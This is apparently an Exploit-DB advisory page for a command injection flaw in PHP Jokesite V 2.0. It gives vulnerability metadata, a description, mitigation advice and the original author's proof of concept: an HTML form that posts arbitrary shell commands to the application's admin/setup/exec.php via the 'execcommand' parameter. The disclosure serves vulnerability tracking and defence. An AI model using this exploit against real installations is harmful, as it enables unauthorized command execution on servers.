PHP Jokesite V 2.0 exec command EXploit

vendor:

PHP Jokesite V 2.0

by:

indoushka

9,3

CVSS

HIGH

Command Injection

CWE

Product Name: PHP Jokesite V 2.0

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:php_jokesite:php_jokesite_v2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)

2009

PHP Jokesite V 2.0 exec command EXploit

A command injection vulnerability exists in PHP Jokesite V 2.0, which allows an attacker to execute arbitrary commands on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input in the 'execcommand' parameter of the 'exec.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This may allow the attacker to execute arbitrary commands on the vulnerable system with the privileges of the web server process.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in the application. Additionally, the application should be configured to use the least privileged account with the minimal set of privileges necessary to perform its intended function.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : PHP Jokesite V 2.0 exec command EXploit            
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com                                                                                                                                                                                                                  
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : execcommand                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
<form action="http://127.0.0.1/php-jokesite_v2/admin/setup/exec.php" method="post">
<input type="hidden" name="action" value="exec">

<table align="center">

<tr>

<td>Enter command to exec:</td>
</tr>

<tr>
<td>
<textarea name="execcommand" cols="60" rows="3">
&lt;/textarea&gt;
</td>

</tr>
<tr>
<td><input type="submit" name="go" value="Go">
</td>

</tr>

</table>

</form>
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------